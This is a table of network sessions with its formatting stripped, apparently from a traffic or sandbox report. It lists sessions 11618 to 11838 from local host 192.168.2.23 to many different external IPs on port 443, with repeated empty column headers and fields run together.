                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11618192.168.2.2360444101.228.185.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11619192.168.2.234768874.25.83.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11620192.168.2.234984436.129.143.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11621192.168.2.2333034180.72.119.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11622192.168.2.234481869.252.247.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11623192.168.2.236041081.111.103.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11624192.168.2.236093254.57.59.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11625192.168.2.2348522138.194.213.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11626192.168.2.23516642.2.127.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11627192.168.2.2341084130.244.29.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11628192.168.2.2347074182.35.92.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11629192.168.2.234145057.141.30.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11630192.168.2.2344088153.88.234.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11631192.168.2.2347568166.230.18.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11632192.168.2.235907032.221.187.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11633192.168.2.2337294166.107.78.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11634192.168.2.2354406143.59.7.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11635192.168.2.2341156198.222.227.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11636192.168.2.235321679.123.68.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11637192.168.2.233760686.177.182.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11638192.168.2.236026083.70.227.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11639192.168.2.2341074177.181.75.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11640192.168.2.235638284.245.110.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11641192.168.2.234878641.198.248.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11642192.168.2.235232486.231.101.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11643192.168.2.2343482154.39.183.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11644192.168.2.2351950203.250.203.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11645192.168.2.2359484117.8.6.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11646192.168.2.2354506212.178.190.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11647192.168.2.2353856173.170.230.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11648192.168.2.2341400197.184.82.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11649192.168.2.235725653.108.34.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11650192.168.2.2360752194.30.36.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11651192.168.2.233486846.163.126.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11652192.168.2.2335540137.163.157.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11653192.168.2.235329263.181.165.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11654192.168.2.235111070.254.60.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11655192.168.2.2339416202.173.204.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11656192.168.2.23582704.253.121.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11657192.168.2.23474809.162.12.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11658192.168.2.235394077.42.70.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11659192.168.2.235054277.209.197.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11660192.168.2.2341676145.107.1.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11661192.168.2.236005840.126.229.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11662192.168.2.2357974156.89.209.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11663192.168.2.2336444183.74.45.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11664192.168.2.2333618199.239.168.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11665192.168.2.2344122163.220.178.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11666192.168.2.235115488.33.12.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11667192.168.2.2337328104.243.119.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11668192.168.2.2347982183.118.132.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11669192.168.2.2359722163.217.124.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11670192.168.2.234239619.159.94.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11671192.168.2.233570075.199.127.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11672192.168.2.2359370223.92.147.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11673192.168.2.2345900122.2.246.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11674192.168.2.2351782186.254.253.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11675192.168.2.2335264143.226.15.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11676192.168.2.2346922210.2.67.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11677192.168.2.234096873.230.87.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11678192.168.2.2358706201.103.119.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11679192.168.2.234625820.74.237.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11680192.168.2.235489694.18.42.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11681192.168.2.235306886.12.116.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11682192.168.2.235044086.153.58.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11683192.168.2.235796641.153.56.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11684192.168.2.2355114217.155.117.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11685192.168.2.233924473.88.245.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11686192.168.2.235819671.47.107.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11687192.168.2.235359292.193.116.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11688192.168.2.233417831.180.35.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11689192.168.2.234443412.39.210.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11690192.168.2.2347592193.119.197.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11691192.168.2.234848442.68.40.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11692192.168.2.234965285.231.200.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11693192.168.2.233342469.113.246.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11694192.168.2.2350396137.115.246.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11695192.168.2.2356626198.68.214.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11696192.168.2.2351220153.88.90.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11697192.168.2.2342808166.175.23.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11698192.168.2.2342332143.11.248.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11699192.168.2.2336164157.22.98.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11700192.168.2.2348274137.67.161.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11701192.168.2.235575465.2.201.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11702192.168.2.234654264.54.7.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11703192.168.2.2348270101.233.223.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11704192.168.2.234882217.195.68.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11705192.168.2.2356468141.65.78.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11706192.168.2.2333192210.116.117.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11707192.168.2.2336672216.199.253.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11708192.168.2.2349332146.90.223.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11709192.168.2.235367288.220.134.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11710192.168.2.2339792111.27.8.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11711192.168.2.234692479.120.8.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11712192.168.2.235369683.204.167.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11713192.168.2.2351500138.123.91.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11714192.168.2.2345754198.102.201.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11715192.168.2.2339736110.93.112.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11716192.168.2.2354196162.253.147.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11717192.168.2.2344196178.193.221.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11718192.168.2.2333158182.31.214.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11719192.168.2.23400124.226.50.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11720192.168.2.2333512138.73.73.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11721192.168.2.2351564113.206.242.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11722192.168.2.2339196188.155.164.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11723192.168.2.2348118108.42.244.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11724192.168.2.23437449.70.189.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11725192.168.2.2342718137.209.55.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11726192.168.2.23462445.113.61.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11727192.168.2.2357778189.10.174.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11728192.168.2.2340938202.157.19.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11729192.168.2.235868286.9.191.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11730192.168.2.2356286152.236.12.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11731192.168.2.2358860173.186.87.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11732192.168.2.2353132150.67.169.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11733192.168.2.2342810108.176.170.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11734192.168.2.234620474.89.100.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11735192.168.2.2335202203.110.107.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11736192.168.2.2339676115.115.245.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11737192.168.2.235436013.121.82.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11738192.168.2.235526039.147.153.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11739192.168.2.2354040136.53.49.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11740192.168.2.233608624.231.162.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11741192.168.2.2335816133.0.79.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11742192.168.2.2345988210.233.5.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11743192.168.2.2354374199.136.143.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11744192.168.2.2350582153.8.85.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11745192.168.2.235204838.128.30.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11746192.168.2.2340342105.220.203.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11747192.168.2.2343828179.168.239.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11748192.168.2.233941612.97.154.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11749192.168.2.234344244.37.27.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11750192.168.2.233458067.178.40.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11751192.168.2.2337374101.65.97.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11752192.168.2.2352710126.181.52.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11753192.168.2.2344854209.79.232.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11754192.168.2.233885276.227.160.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11755192.168.2.2336994152.162.254.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11756192.168.2.235423060.155.99.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11757192.168.2.2333294114.47.59.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11758192.168.2.2332896209.163.105.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11759192.168.2.233717813.192.37.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11760192.168.2.2352474105.76.254.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11761192.168.2.2340812190.163.174.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11762192.168.2.23548162.138.248.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11763192.168.2.2341720109.210.25.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11764192.168.2.234734250.15.93.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11765192.168.2.2335854148.23.190.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11766192.168.2.2347490181.67.65.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11767192.168.2.2335246136.205.90.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11768192.168.2.235103053.167.224.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11769192.168.2.2334082162.118.77.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11770192.168.2.2343538155.210.138.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11771192.168.2.234601450.105.71.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11772192.168.2.235703660.105.241.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11773192.168.2.235369848.97.167.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11774192.168.2.2360976115.236.204.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11775192.168.2.2351852207.13.10.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11776192.168.2.2359520136.34.60.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11777192.168.2.234767042.140.72.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11778192.168.2.235737473.23.94.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11779192.168.2.2344724110.67.173.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11780192.168.2.2333614187.202.187.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11781192.168.2.2342360187.12.123.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11782192.168.2.235529676.228.223.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11783192.168.2.235856236.104.19.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11784192.168.2.2337058202.152.121.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11785192.168.2.2344376194.198.40.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11786192.168.2.2358186151.159.33.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11787192.168.2.234577019.72.88.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11788192.168.2.233840866.90.175.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11789192.168.2.234148293.30.228.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11790192.168.2.2360182115.70.177.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11791192.168.2.23393522.200.102.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11792192.168.2.235828049.130.148.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11793192.168.2.2360278199.244.120.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11794192.168.2.2333920160.243.79.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11795192.168.2.235263614.13.181.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11796192.168.2.236090093.158.32.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11797192.168.2.2333886192.94.47.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11798192.168.2.235158847.239.13.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11799192.168.2.235087689.242.255.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11800192.168.2.233752657.38.183.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11801192.168.2.2351356125.32.237.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11802192.168.2.235187279.35.76.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11803192.168.2.2348304119.255.230.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11804192.168.2.235449445.110.162.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11805192.168.2.23550144.176.50.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11806192.168.2.2357818113.11.44.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11807192.168.2.2335588148.211.63.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11808192.168.2.23464042.236.81.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11809192.168.2.2353310172.120.11.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11810192.168.2.2358948101.181.158.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11811192.168.2.2354072197.238.7.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11812192.168.2.2344402206.163.198.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11813192.168.2.2342598132.95.101.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11814192.168.2.2333704141.104.201.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11815192.168.2.2349038123.161.54.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11816192.168.2.2342030199.100.156.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11817192.168.2.2342674118.151.214.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11818192.168.2.2333962159.155.149.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11819192.168.2.2336126178.113.251.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11820192.168.2.2336254149.43.246.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11821192.168.2.2350450121.133.38.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11822192.168.2.235159479.140.202.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11823192.168.2.2334524208.83.128.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11824192.168.2.23445168.107.115.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11825192.168.2.23470982.143.119.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11826192.168.2.2339758145.56.168.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11827192.168.2.234797048.49.21.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11828192.168.2.2356900219.212.127.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11829192.168.2.233696675.101.65.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11830192.168.2.2340172132.179.230.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11831192.168.2.235045061.187.72.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11832192.168.2.2355588141.195.44.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11833192.168.2.234141477.41.192.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11834192.168.2.233437653.96.215.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11835192.168.2.233717050.104.56.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11836192.168.2.2344448161.251.87.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11837192.168.2.2356976167.181.246.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11838192.168.2.2346964180.254.127.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
